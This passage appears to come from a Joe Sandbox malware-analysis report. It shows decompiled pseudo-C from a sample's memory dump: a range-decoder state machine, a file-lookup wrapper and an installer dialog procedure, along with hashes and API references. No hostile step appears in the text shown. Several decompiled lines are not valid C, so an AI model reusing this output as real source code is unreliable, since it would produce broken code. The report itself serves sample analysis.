                    								__eax = (__eflags >= 0) - 1 + 0xa;
                    								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    								__eax =  *(__ebp - 4);
                    								__eax =  *(__ebp - 4) + 0x664;
                    								__eflags = __eax;
                    								 *(__ebp - 0x58) = __eax;
                    								goto L68;
                    							}
                    							__eax =  *(__ebp - 4);
                    							__ecx =  *(__ebp - 0x38);
                    							 *(__ebp - 0x84) = 8;
                    							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    							goto L132;
                    						case 8:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x84) = 0xa;
                    								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    							} else {
                    								__eax =  *(__ebp - 0x38);
                    								__ecx =  *(__ebp - 4);
                    								__eax =  *(__ebp - 0x38) + 0xf;
                    								 *(__ebp - 0x84) = 9;
                    								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    							}
                    							goto L132;
                    						case 9:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								goto L89;
                    							}
                    							__eflags =  *(__ebp - 0x60);
                    							if( *(__ebp - 0x60) == 0) {
                    								goto L171;
                    							}
                    							__eax = 0;
                    							__eflags =  *(__ebp - 0x38) - 7;
                    							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                    							__eflags = _t258;
                    							0 | _t258 = _t258 + _t258 + 9;
                    							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                    							goto L75;
                    						case 0xa:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x84) = 0xb;
                    								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x28);
                    							goto L88;
                    						case 0xb:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__ecx =  *(__ebp - 0x24);
                    								__eax =  *(__ebp - 0x20);
                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    							} else {
                    								__eax =  *(__ebp - 0x24);
                    							}
                    							__ecx =  *(__ebp - 0x28);
                    							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    							L88:
                    							__ecx =  *(__ebp - 0x2c);
                    							 *(__ebp - 0x2c) = __eax;
                    							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    							L89:
                    							__eax =  *(__ebp - 4);
                    							 *(__ebp - 0x80) = 0x15;
                    							__eax =  *(__ebp - 4) + 0xa68;
                    							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    							goto L68;
                    						case 0xc:
                    							L99:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xc;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t334 = __ebp - 0x70;
                    							 *_t334 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t334;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							__eax =  *(__ebp - 0x2c);
                    							goto L101;
                    						case 0xd:
                    							goto L36;
                    						case 0xe:
                    							goto L45;
                    						case 0xf:
                    							goto L57;
                    						case 0x10:
                    							L109:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0x10;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t365 = __ebp - 0x70;
                    							 *_t365 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t365;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							goto L111;
                    						case 0x11:
                    							L68:
                    							__esi =  *(__ebp - 0x58);
                    							 *(__ebp - 0x84) = 0x12;
                    							goto L132;
                    						case 0x12:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 0x58);
                    								 *(__ebp - 0x84) = 0x13;
                    								__esi =  *(__ebp - 0x58) + 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x4c);
                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    							__ecx =  *(__ebp - 0x58);
                    							__eax =  *(__ebp - 0x4c) << 4;
                    							__eflags = __eax;
                    							__eax =  *(__ebp - 0x58) + __eax + 4;
                    							goto L130;
                    						case 0x13:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								_t469 = __ebp - 0x58;
                    								 *_t469 =  *(__ebp - 0x58) + 0x204;
                    								__eflags =  *_t469;
                    								 *(__ebp - 0x30) = 0x10;
                    								 *(__ebp - 0x40) = 8;
                    								L144:
                    								 *(__ebp - 0x7c) = 0x14;
                    								goto L145;
                    							}
                    							__eax =  *(__ebp - 0x4c);
                    							__ecx =  *(__ebp - 0x58);
                    							__eax =  *(__ebp - 0x4c) << 4;
                    							 *(__ebp - 0x30) = 8;
                    							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    							L130:
                    							 *(__ebp - 0x58) = __eax;
                    							 *(__ebp - 0x40) = 3;
                    							goto L144;
                    						case 0x14:
                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    							__eax =  *(__ebp - 0x80);
                    							goto L140;
                    						case 0x15:
                    							__eax = 0;
                    							__eflags =  *(__ebp - 0x38) - 7;
                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    							__al = __al & 0x000000fd;
                    							__eax = (__eflags >= 0) - 1 + 0xb;
                    							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    							goto L120;
                    						case 0x16:
                    							__eax =  *(__ebp - 0x30);
                    							__eflags = __eax - 4;
                    							if(__eax >= 4) {
                    								_push(3);
                    								_pop(__eax);
                    							}
                    							__ecx =  *(__ebp - 4);
                    							 *(__ebp - 0x40) = 6;
                    							__eax = __eax << 7;
                    							 *(__ebp - 0x7c) = 0x19;
                    							 *(__ebp - 0x58) = __eax;
                    							goto L145;
                    						case 0x17:
                    							L145:
                    							__eax =  *(__ebp - 0x40);
                    							 *(__ebp - 0x50) = 1;
                    							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    							goto L149;
                    						case 0x18:
                    							L146:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0x18;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t484 = __ebp - 0x70;
                    							 *_t484 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t484;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							L148:
                    							_t487 = __ebp - 0x48;
                    							 *_t487 =  *(__ebp - 0x48) - 1;
                    							__eflags =  *_t487;
                    							L149:
                    							__eflags =  *(__ebp - 0x48);
                    							if( *(__ebp - 0x48) <= 0) {
                    								__ecx =  *(__ebp - 0x40);
                    								__ebx =  *(__ebp - 0x50);
                    								0 = 1;
                    								__eax = 1 << __cl;
                    								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    								__eax =  *(__ebp - 0x7c);
                    								 *(__ebp - 0x44) = __ebx;
                    								goto L140;
                    							}
                    							__eax =  *(__ebp - 0x50);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    							__eax =  *(__ebp - 0x58);
                    							__esi = __edx + __eax;
                    							 *(__ebp - 0x54) = __esi;
                    							__ax =  *__esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    							__eflags =  *(__ebp - 0xc) - __ecx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								__cx = __ax >> 5;
                    								__eax = __eax - __ecx;
                    								__edx = __edx + 1;
                    								__eflags = __edx;
                    								 *__esi = __ax;
                    								 *(__ebp - 0x50) = __edx;
                    							} else {
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    								 *__esi = __cx;
                    							}
                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								goto L148;
                    							} else {
                    								goto L146;
                    							}
                    						case 0x19:
                    							__eflags = __ebx - 4;
                    							if(__ebx < 4) {
                    								 *(__ebp - 0x2c) = __ebx;
                    								L119:
                    								_t393 = __ebp - 0x2c;
                    								 *_t393 =  *(__ebp - 0x2c) + 1;
                    								__eflags =  *_t393;
                    								L120:
                    								__eax =  *(__ebp - 0x2c);
                    								__eflags = __eax;
                    								if(__eax == 0) {
                    									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    									goto L170;
                    								}
                    								__eflags = __eax -  *(__ebp - 0x60);
                    								if(__eax >  *(__ebp - 0x60)) {
                    									goto L171;
                    								}
                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    								__eax =  *(__ebp - 0x30);
                    								_t400 = __ebp - 0x60;
                    								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    								__eflags =  *_t400;
                    								goto L123;
                    							}
                    							__ecx = __ebx;
                    							__eax = __ebx;
                    							__ecx = __ebx >> 1;
                    							__eax = __ebx & 0x00000001;
                    							__ecx = (__ebx >> 1) - 1;
                    							__al = __al | 0x00000002;
                    							__eax = (__ebx & 0x00000001) << __cl;
                    							__eflags = __ebx - 0xe;
                    							 *(__ebp - 0x2c) = __eax;
                    							if(__ebx >= 0xe) {
                    								__ebx = 0;
                    								 *(__ebp - 0x48) = __ecx;
                    								L102:
                    								__eflags =  *(__ebp - 0x48);
                    								if( *(__ebp - 0x48) <= 0) {
                    									__eax = __eax + __ebx;
                    									 *(__ebp - 0x40) = 4;
                    									 *(__ebp - 0x2c) = __eax;
                    									__eax =  *(__ebp - 4);
                    									__eax =  *(__ebp - 4) + 0x644;
                    									__eflags = __eax;
                    									L108:
                    									__ebx = 0;
                    									 *(__ebp - 0x58) = __eax;
                    									 *(__ebp - 0x50) = 1;
                    									 *(__ebp - 0x44) = 0;
                    									 *(__ebp - 0x48) = 0;
                    									L112:
                    									__eax =  *(__ebp - 0x40);
                    									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    										_t391 = __ebp - 0x2c;
                    										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    										__eflags =  *_t391;
                    										goto L119;
                    									}
                    									__eax =  *(__ebp - 0x50);
                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    									__eax =  *(__ebp - 0x58);
                    									__esi = __edi + __eax;
                    									 *(__ebp - 0x54) = __esi;
                    									__ax =  *__esi;
                    									__ecx = __ax & 0x0000ffff;
                    									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    									__eflags =  *(__ebp - 0xc) - __edx;
                    									if( *(__ebp - 0xc) >= __edx) {
                    										__ecx = 0;
                    										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    										__ecx = 1;
                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    										__ebx = 1;
                    										__ecx =  *(__ebp - 0x48);
                    										__ebx = 1 << __cl;
                    										__ecx = 1 << __cl;
                    										__ebx =  *(__ebp - 0x44);
                    										__ebx =  *(__ebp - 0x44) | __ecx;
                    										__cx = __ax;
                    										__cx = __ax >> 5;
                    										__eax = __eax - __ecx;
                    										__edi = __edi + 1;
                    										__eflags = __edi;
                    										 *(__ebp - 0x44) = __ebx;
                    										 *__esi = __ax;
                    										 *(__ebp - 0x50) = __edi;
                    									} else {
                    										 *(__ebp - 0x10) = __edx;
                    										0x800 = 0x800 - __ecx;
                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    										 *__esi = __dx;
                    									}
                    									__eflags =  *(__ebp - 0x10) - 0x1000000;
                    									if( *(__ebp - 0x10) >= 0x1000000) {
                    										L111:
                    										_t368 = __ebp - 0x48;
                    										 *_t368 =  *(__ebp - 0x48) + 1;
                    										__eflags =  *_t368;
                    										goto L112;
                    									} else {
                    										goto L109;
                    									}
                    								}
                    								__ecx =  *(__ebp - 0xc);
                    								__ebx = __ebx + __ebx;
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    								 *(__ebp - 0x44) = __ebx;
                    								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    									__ecx =  *(__ebp - 0x10);
                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    									__ebx = __ebx | 0x00000001;
                    									__eflags = __ebx;
                    									 *(__ebp - 0x44) = __ebx;
                    								}
                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                    								if( *(__ebp - 0x10) >= 0x1000000) {
                    									L101:
                    									_t338 = __ebp - 0x48;
                    									 *_t338 =  *(__ebp - 0x48) - 1;
                    									__eflags =  *_t338;
                    									goto L102;
                    								} else {
                    									goto L99;
                    								}
                    							}
                    							__edx =  *(__ebp - 4);
                    							__eax = __eax - __ebx;
                    							 *(__ebp - 0x40) = __ecx;
                    							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    							goto L108;
                    						case 0x1a:
                    							goto L55;
                    						case 0x1b:
                    							L75:
                    							__eflags =  *(__ebp - 0x64);
                    							if( *(__ebp - 0x64) == 0) {
                    								 *(__ebp - 0x88) = 0x1b;
                    								goto L170;
                    							}
                    							__eax =  *(__ebp - 0x14);
                    							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    							__eflags = __eax -  *(__ebp - 0x74);
                    							if(__eax >=  *(__ebp - 0x74)) {
                    								__eax = __eax +  *(__ebp - 0x74);
                    								__eflags = __eax;
                    							}
                    							__edx =  *(__ebp - 8);
                    							__cl =  *(__eax + __edx);
                    							__eax =  *(__ebp - 0x14);
                    							 *(__ebp - 0x5c) = __cl;
                    							 *(__eax + __edx) = __cl;
                    							__eax = __eax + 1;
                    							__edx = 0;
                    							_t274 = __eax %  *(__ebp - 0x74);
                    							__eax = __eax /  *(__ebp - 0x74);
                    							__edx = _t274;
                    							__eax =  *(__ebp - 0x68);
                    							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    							_t283 = __ebp - 0x64;
                    							 *_t283 =  *(__ebp - 0x64) - 1;
                    							__eflags =  *_t283;
                    							 *( *(__ebp - 0x68)) = __cl;
                    							goto L79;
                    						case 0x1c:
                    							while(1) {
                    								L123:
                    								__eflags =  *(__ebp - 0x64);
                    								if( *(__ebp - 0x64) == 0) {
                    									break;
                    								}
                    								__eax =  *(__ebp - 0x14);
                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    								__eflags = __eax -  *(__ebp - 0x74);
                    								if(__eax >=  *(__ebp - 0x74)) {
                    									__eax = __eax +  *(__ebp - 0x74);
                    									__eflags = __eax;
                    								}
                    								__edx =  *(__ebp - 8);
                    								__cl =  *(__eax + __edx);
                    								__eax =  *(__ebp - 0x14);
                    								 *(__ebp - 0x5c) = __cl;
                    								 *(__eax + __edx) = __cl;
                    								__eax = __eax + 1;
                    								__edx = 0;
                    								_t414 = __eax %  *(__ebp - 0x74);
                    								__eax = __eax /  *(__ebp - 0x74);
                    								__edx = _t414;
                    								__eax =  *(__ebp - 0x68);
                    								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    								__eflags =  *(__ebp - 0x30);
                    								 *( *(__ebp - 0x68)) = __cl;
                    								 *(__ebp - 0x14) = __edx;
                    								if( *(__ebp - 0x30) > 0) {
                    									continue;
                    								} else {
                    									goto L80;
                    								}
                    							}
                    							 *(__ebp - 0x88) = 0x1c;
                    							goto L170;
                    					}
                    				}
                    			}














                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                    • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                    • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                    • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040699E(WCHAR* _a4) {
                    				void* _t2;
                    
                    				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                    				if(_t2 == 0xffffffff) {
                    					return 0;
                    				}
                    				FindClose(_t2);
                    				return 0x426798;
                    			}





                    APIs
                    • FindFirstFileW.KERNELBASE(7476FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004069A9
                    • FindClose.KERNEL32(00000000), ref: 004069B5
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                    • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                    • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                    • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (graph 141, entry block 4040c5-4040d7; legend: Executed / Not Executed; graph not reproduced)
                    C-Code - Quality: 84%
                    			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                    				struct HWND__* _v28;
                    				void* _v84;
                    				void* _v88;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t34;
                    				signed int _t36;
                    				signed int _t38;
                    				struct HWND__* _t48;
                    				signed int _t67;
                    				struct HWND__* _t73;
                    				signed int _t86;
                    				struct HWND__* _t91;
                    				signed int _t99;
                    				int _t103;
                    				signed int _t117;
                    				int _t118;
                    				int _t122;
                    				signed int _t124;
                    				struct HWND__* _t127;
                    				struct HWND__* _t128;
                    				int _t129;
                    				intOrPtr _t130;
                    				long _t133;
                    				int _t135;
                    				int _t136;
                    				void* _t137;
                    				void* _t145;
                    
                    				_t130 = _a8;
                    				if(_t130 == 0x110 || _t130 == 0x408) {
                    					_t34 = _a12;
                    					_t127 = _a4;
                    					__eflags = _t130 - 0x110;
                    					 *0x423730 = _t34;
                    					if(_t130 == 0x110) {
                    						 *0x42a268 = _t127;
                    						 *0x423744 = GetDlgItem(_t127, 1);
                    						_t91 = GetDlgItem(_t127, 2);
                    						_push(0xffffffff);
                    						_push(0x1c);
                    						 *0x421710 = _t91;
                    						E004045C4(_t127);
                    						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                    						 *0x42922c = E0040140B(4);
                    						_t34 = 1;
                    						__eflags = 1;
                    						 *0x423730 = 1;
                    					}
                    					_t124 =  *0x40a39c; // 0x0
                    					_t136 = 0;
                    					_t133 = (_t124 << 6) +  *0x42a280;
                    					__eflags = _t124;
                    					if(_t124 < 0) {
                    						L36:
                    						E00404610(0x40b);
                    						while(1) {
                    							_t36 =  *0x423730;
                    							 *0x40a39c =  *0x40a39c + _t36;
                    							_t133 = _t133 + (_t36 << 6);
                    							_t38 =  *0x40a39c; // 0x0
                    							__eflags = _t38 -  *0x42a284;
                    							if(_t38 ==  *0x42a284) {
                    								E0040140B(1);
                    							}
                    							__eflags =  *0x42922c - _t136;
                    							if( *0x42922c != _t136) {
                    								break;
                    							}
                    							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                    							if(__eflags >= 0) {
                    								break;
                    							}
                    							_t117 =  *(_t133 + 0x14);
                    							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                    							_push( *((intOrPtr*)(_t133 + 0x20)));
                    							_push(0xfffffc19);
                    							E004045C4(_t127);
                    							_push( *((intOrPtr*)(_t133 + 0x1c)));
                    							_push(0xfffffc1b);
                    							E004045C4(_t127);
                    							_push( *((intOrPtr*)(_t133 + 0x28)));
                    							_push(0xfffffc1a);
                    							E004045C4(_t127);
                    							_t48 = GetDlgItem(_t127, 3);
                    							__eflags =  *0x42a2ec - _t136;
                    							_v28 = _t48;
                    							if( *0x42a2ec != _t136) {
                    								_t117 = _t117 & 0x0000fefd | 0x00000004;
                    								__eflags = _t117;
                    							}
                    							ShowWindow(_t48, _t117 & 0x00000008);
                    							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                    							E004045E6(_t117 & 0x00000002);
                    							_t118 = _t117 & 0x00000004;
                    							EnableWindow( *0x421710, _t118);
                    							__eflags = _t118 - _t136;
                    							if(_t118 == _t136) {
                    								_push(1);
                    							} else {
                    								_push(_t136);
                    							}
                    							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                    							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                    							__eflags =  *0x42a2ec - _t136;
                    							if( *0x42a2ec == _t136) {
                    								_push( *0x423744);
                    							} else {
                    								SendMessageW(_t127, 0x401, 2, _t136);
                    								_push( *0x421710);
                    							}
                    							E004045F9();
                    							E00406668(0x423748, E004040A6());
                    							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                    							SetWindowTextW(_t127, 0x423748);
                    							_push(_t136);
                    							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                    							__eflags = _t67;
                    							if(_t67 != 0) {
                    								continue;
                    							} else {
                    								__eflags =  *_t133 - _t136;
                    								if( *_t133 == _t136) {
                    									continue;
                    								}
                    								__eflags =  *(_t133 + 4) - 5;
                    								if( *(_t133 + 4) != 5) {
                    									DestroyWindow( *0x429238);
                    									 *0x422720 = _t133;
                    									__eflags =  *_t133 - _t136;
                    									if( *_t133 <= _t136) {
                    										goto L60;
                    									}
                    									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                    									__eflags = _t73 - _t136;
                    									 *0x429238 = _t73;
                    									if(_t73 == _t136) {
                    										goto L60;
                    									}
                    									_push( *((intOrPtr*)(_t133 + 0x2c)));
                    									_push(6);
                    									E004045C4(_t73);
                    									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                    									ScreenToClient(_t127, _t137 + 0x10);
                    									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                    									_push(_t136);
                    									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                    									__eflags =  *0x42922c - _t136;
                    									if( *0x42922c != _t136) {
                    										goto L63;
                    									}
                    									ShowWindow( *0x429238, 8);
                    									E00404610(0x405);
                    									goto L60;
                    								}
                    								__eflags =  *0x42a2ec - _t136;
                    								if( *0x42a2ec != _t136) {
                    									goto L63;
                    								}
                    								__eflags =  *0x42a2e0 - _t136;
                    								if( *0x42a2e0 != _t136) {
                    									continue;
                    								}
                    								goto L63;
                    							}
                    						}
                    						DestroyWindow( *0x429238); // executed
                    						 *0x42a268 = _t136;
                    						EndDialog(_t127,  *0x421f18);
                    						goto L60;
                    					} else {
                    						__eflags = _t34 - 1;
                    						if(_t34 != 1) {
                    							L35:
                    							__eflags =  *_t133 - _t136;
                    							if( *_t133 == _t136) {
                    								goto L63;
                    							}
                    							goto L36;
                    						}
                    						_push(0);
                    						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                    						__eflags = _t86;
                    						if(_t86 == 0) {
                    							goto L35;
                    						}
                    						SendMessageW( *0x429238, 0x40f, 0, 1);
                    						__eflags =  *0x42922c;
                    						return 0 |  *0x42922c == 0x00000000;
                    					}
                    				} else {
                    					_t127 = _a4;
                    					_t136 = 0;
                    					if(_t130 == 0x47) {
                    						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                    					}
                    					_t122 = _a12;
                    					if(_t130 != 5) {
                    						L8:
                    						if(_t130 != 0x40d) {
                    							__eflags = _t130 - 0x11;
                    							if(_t130 != 0x11) {
                    								__eflags = _t130 - 0x111;
                    								if(_t130 != 0x111) {
                    									goto L28;
                    								}
                    								_t135 = _t122 & 0x0000ffff;
                    								_t128 = GetDlgItem(_t127, _t135);
                    								__eflags = _t128 - _t136;
                    								if(_t128 == _t136) {
                    									L15:
                    									__eflags = _t135 - 1;
                    									if(_t135 != 1) {
                    										__eflags = _t135 - 3;
                    										if(_t135 != 3) {
                    											_t129 = 2;
                    											__eflags = _t135 - _t129;
                    											if(_t135 != _t129) {
